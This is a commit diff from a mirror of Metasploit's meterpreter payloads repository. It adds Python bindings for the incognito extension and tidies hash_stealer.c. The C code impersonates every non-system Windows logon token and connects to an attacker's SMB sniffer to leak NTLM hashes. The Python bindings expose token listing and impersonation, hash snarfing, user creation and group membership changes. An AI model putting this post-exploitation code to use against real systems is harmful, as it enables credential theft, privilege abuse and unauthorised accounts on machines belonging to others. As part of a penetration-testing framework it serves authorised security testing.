mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-01-02 11:36:22 +01:00
Add incognito binding, code tidies
This commit is contained in:
parent
cbb50227a5
commit
e016e6d526
37
c/meterpreter/source/extensions/incognito/hash_stealer.c
Normal file → Executable file
37
c/meterpreter/source/extensions/incognito/hash_stealer.c
Normal file → Executable file
@ -48,26 +48,29 @@ DWORD request_incognito_snarf_hashes(Remote *remote, Packet *packet)
|
||||
}
|
||||
|
||||
// Use every token and get hashes by connecting to SMB sniffer
|
||||
for (i=0;i<num_tokens;i++)
|
||||
if (token_list[i].token)
|
||||
for (i = 0; i < num_tokens; i++)
|
||||
{
|
||||
get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE);
|
||||
// If token is not "useless" local account connect to sniffer
|
||||
if (_stricmp(domain_name, "NT AUTHORITY"))
|
||||
if (token_list[i].token)
|
||||
{
|
||||
// Impersonate token
|
||||
ImpersonateLoggedOnUser(token_list[i].token);
|
||||
|
||||
// Cancel previous connection to ensure hashes are sent and existing connection isn't reused
|
||||
WNetCancelConnection2A(nr.lpRemoteName, 0, TRUE);
|
||||
|
||||
// Connect to smb sniffer
|
||||
if (!WNetAddConnection2A(&nr, NULL, NULL, 0))
|
||||
get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE);
|
||||
// If token is not "useless" local account connect to sniffer
|
||||
if (_stricmp(domain_name, "NT AUTHORITY"))
|
||||
{
|
||||
// Impersonate token
|
||||
ImpersonateLoggedOnUser(token_list[i].token);
|
||||
|
||||
// Revert to primary token
|
||||
RevertToSelf();
|
||||
// Cancel previous connection to ensure hashes are sent and existing connection isn't reused
|
||||
WNetCancelConnection2A(nr.lpRemoteName, 0, TRUE);
|
||||
|
||||
// Connect to smb sniffer
|
||||
if (!WNetAddConnection2A(&nr, NULL, NULL, 0))
|
||||
{
|
||||
// Revert to primary token
|
||||
RevertToSelf();
|
||||
}
|
||||
}
|
||||
CloseHandle(token_list[i].token);
|
||||
}
|
||||
CloseHandle(token_list[i].token);
|
||||
}
|
||||
|
||||
packet_transmit_response(ERROR_SUCCESS, remote, response);
|
||||
@ -77,7 +80,9 @@ cleanup:
|
||||
|
||||
// Restore token impersonation
|
||||
if (saved_token != INVALID_HANDLE_VALUE)
|
||||
{
|
||||
ImpersonateLoggedOnUser(saved_token);
|
||||
}
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
@ -1,2 +1,2 @@
|
||||
__all__ = ['core', 'elevate', 'fs', 'tlv', 'kiwi', 'user', 'sys', 'extapi']
|
||||
__all__ = ['core', 'elevate', 'fs', 'tlv', 'kiwi', 'user', 'sys', 'extapi', 'incognito']
|
||||
|
||||
|
@ -0,0 +1,77 @@
|
||||
import meterpreter_bindings
|
||||
|
||||
from meterpreter.core import *
|
||||
from meterpreter.tlv import *
|
||||
|
||||
INCOGNITO_NO_TOKENS = 'No tokens available\n'
|
||||
|
||||
def list_user_tokens():
|
||||
return __list_tokens_internal(0)
|
||||
|
||||
def list_group_tokens():
|
||||
return __list_tokens_internal(1)
|
||||
|
||||
def __list_tokens_internal(order):
|
||||
tlv = tlv_pack(TLV_TYPE_INCOGNITO_LIST_TOKENS_TOKEN_ORDER, order)
|
||||
resp = invoke_meterpreter('incognito_list_tokens', True, tlv)
|
||||
|
||||
if resp == None:
|
||||
return None
|
||||
|
||||
if packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] != 0:
|
||||
return None
|
||||
|
||||
delegation = packet_get_tlv(resp, TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION)['value']
|
||||
impersonation = packet_get_tlv(resp, TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION)['value']
|
||||
return {
|
||||
'Impersonation': impersonation.strip().split('\n') if impersonation != INCOGNITO_NO_TOKENS else [],
|
||||
'Delegation': delegation.strip().split('\n') if delegation != INCOGNITO_NO_TOKENS else []
|
||||
}
|
||||
|
||||
def impersonate(user):
|
||||
tlv = tlv_pack(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, user)
|
||||
resp = invoke_meterpreter('incognito_impersonate_token', True, tlv)
|
||||
|
||||
if resp == None:
|
||||
return False
|
||||
|
||||
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
|
||||
|
||||
def snarf_hashes(server):
|
||||
tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
|
||||
resp = invoke_meterpreter('incognito_snarf_hashes', True, tlv)
|
||||
|
||||
if resp == None:
|
||||
return False
|
||||
|
||||
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
|
||||
|
||||
def add_user(server, username, password):
|
||||
tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
|
||||
tlv += tlv_pack(TLV_TYPE_INCOGNITO_USERNAME, username)
|
||||
tlv += tlv_pack(TLV_TYPE_INCOGNITO_PASSWORD, password)
|
||||
|
||||
resp = invoke_meterpreter('incognito_add_user', True, tlv)
|
||||
|
||||
if resp == None:
|
||||
return False
|
||||
|
||||
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
|
||||
|
||||
def add_group_user(server, group, username):
|
||||
return __add_group_user_internal('incognito_add_group_user', server, group, username)
|
||||
|
||||
def add_localgroup_user(server, group, username):
|
||||
return __add_group_user_internal('incognito_add_localgroup_user', server, group, username)
|
||||
|
||||
def __add_group_user_internal(msg, server, group, username):
|
||||
tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
|
||||
tlv += tlv_pack(TLV_TYPE_INCOGNITO_USERNAME, username)
|
||||
tlv += tlv_pack(TLV_TYPE_INCOGNITO_GROUPNAME, group)
|
||||
|
||||
resp = invoke_meterpreter(msg, True, tlv)
|
||||
|
||||
if resp == None:
|
||||
return False
|
||||
|
||||
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
|
@ -1,8 +1,9 @@
|
||||
from meterpreter.core import *
|
||||
|
||||
TLV_STDAPI_EXTENSION = 0
|
||||
TLV_PRIV_EXTENSION = 20000
|
||||
TLV_KIWI_EXTENSION = 20000
|
||||
TLV_STDAPI_EXTENSION = 0
|
||||
TLV_INCOGNITO_EXTENSION = 20000
|
||||
TLV_PRIV_EXTENSION = 20000
|
||||
TLV_KIWI_EXTENSION = 20000
|
||||
|
||||
# Stdapi constants
|
||||
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1040)
|
||||
@ -45,4 +46,14 @@ TLV_TYPE_KIWI_PWD_AUTH_LO = TLV_META_TYPE_UINT | (TLV_KIWI_EXTENSION +
|
||||
TLV_TYPE_KIWI_PWD_LMHASH = TLV_META_TYPE_STRING | (TLV_KIWI_EXTENSION + 8)
|
||||
TLV_TYPE_KIWI_PWD_NTLMHASH = TLV_META_TYPE_STRING | (TLV_KIWI_EXTENSION + 9)
|
||||
|
||||
# Incognito constants
|
||||
TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 2)
|
||||
TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 3)
|
||||
TLV_TYPE_INCOGNITO_LIST_TOKENS_TOKEN_ORDER = TLV_META_TYPE_UINT | (TLV_INCOGNITO_EXTENSION + 4)
|
||||
TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 5)
|
||||
TLV_TYPE_INCOGNITO_GENERIC_RESPONSE = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 6)
|
||||
TLV_TYPE_INCOGNITO_USERNAME = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 7)
|
||||
TLV_TYPE_INCOGNITO_PASSWORD = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 8)
|
||||
TLV_TYPE_INCOGNITO_SERVERNAME = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 9)
|
||||
TLV_TYPE_INCOGNITO_GROUPNAME = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 10)
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user